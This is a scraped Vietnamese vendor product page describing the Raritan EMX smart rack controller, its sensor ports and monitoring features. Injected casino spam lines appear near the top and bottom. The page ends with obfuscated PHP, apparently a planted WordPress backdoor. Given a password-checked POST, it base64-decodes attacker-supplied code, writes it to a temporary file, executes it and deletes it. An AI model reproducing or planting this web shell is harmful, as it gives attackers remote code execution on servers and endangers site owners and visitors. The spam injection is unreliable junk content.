EMX - Smart Rack Controller and Sensors - Thiết bị cảm biến và điều khiển rack thông minh - Máy Chủ Việt Nam
jeu plinko avis pin up catcasino vavada официальный jucky jet

EMX – Smart Rack Controller and Sensors – Thiết bị cảm biến và điều khiển rack thông minh

Ngày 23/02/2013 đăng bởi seo3.VS [email protected]

Mỗi trung tâm dữ liệu có một số phương pháp để theo dõi nhiệt độ ngay cả khi nó chỉ là nhiệt kế gắn trên tường. Nhưng ngày nay, hầu hết các phương pháp đó không được coi là tốt và hiệu quả. Hiệp hội American Society of Heating, Refrigerating and Air-Conditioning Engineers (ASHRAE) khuyến cáo đo, theo dõi nhiệt độ tại các vị trí bên dưới, trên và giữa của mỗi rack.

Ngày nay, các nhà quản trị trung tâm dữ liệu muốn trang bị hệ thống với các đầu dò nước, độ ẩm, khói hoặc khi một cánh cửa cabinet mở ra. Một số nhà quản trị muốn lắp đặt camera quan sát cho mục đích bảo mật để theo dõi các thay đổi hay hoặc nhìn thấy môi trường hoạt động vật lý từ xa.

GIỚI THIỆU SẢN PHẨM

Thiết bị điều khiển rack thông minh của Raritan có thể kết nối đến bất kỳ đầu dò nhiệt độ, độ ẩm nào của Raritan, phần mềm quản lý điện năng Power IQ®, thẻ quản lý tài sản của giải pháp quản lý thiết bị AMT & AMS, dcTrack® – phần mềm quản lý cơ sở hạ tầng data center (Data Center Infrastructure Management – DCIM) hay các hệ thống quản lý tài sản của hãng thứ 3 hỗ trợ SNMP.

 

EMX có kích thước 1U có chức năng như một SNMP gateway với 1 port cho đầu dò Raritan 1-Wire®, cũng như các port RS-485 serial, KVM, DB-9 modem/console, USB-A, USB-B và contact closure.

EMX Smart Sensor Controller

  Sensor Ports RJ-45,
RS-485
Ports
RJ-45
Feature
Ports
USB-A
Ports
USB-B
Ports
DB-9M
console/modem
RJ-45
Ethernet
Contact
Closure
EMX2-111 1 1 1 1 1 1 1 0
EMX2-888 8 8 8 2 1 1 1 2

TÍNH NĂNG VÀ ƯU ĐIỂM

Features Benefits
Procedures
The EMX smart rack controller provides simplified yet comprehensive environment monitoring to your IT racks. Raritan’s rack monitoring solution helps you manage the physical environment of your rack. With this solution and the appropriate sensors you can:
Minimize the hours needed to track IT assets, thereby saving time and money Ensure uptime by monitoring racks for possible hot spots
Save on cooling costs by confidently raising data center temperatures
Maintain cabinet security with USB webcams and contact closure sensors
Improve data center uptime by receiving environment alerts
Optimize strategic and tactical decision making for the IT environment by tracking IT changes and growth in real time
Hardware
What ports are available on the EMX? The EMX has 1-Wire ports for Raritan sensors as well as the following ports: RS-485, KVM, DB-9 console, Ethernet, and USB-A and USB-B.
Software
The EMX has its own GUI as well as interfacing to the GUIs of Power IQ® and dcTrack®. For small data centers, one EMX can bring the data from a variety of sensors into one, manageable location. For medium-size and larger data centers Power IQ and dcTrack can consolidate the data from several EMXs, as well as PX iPDUs, making data center management faster and easier.

 

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}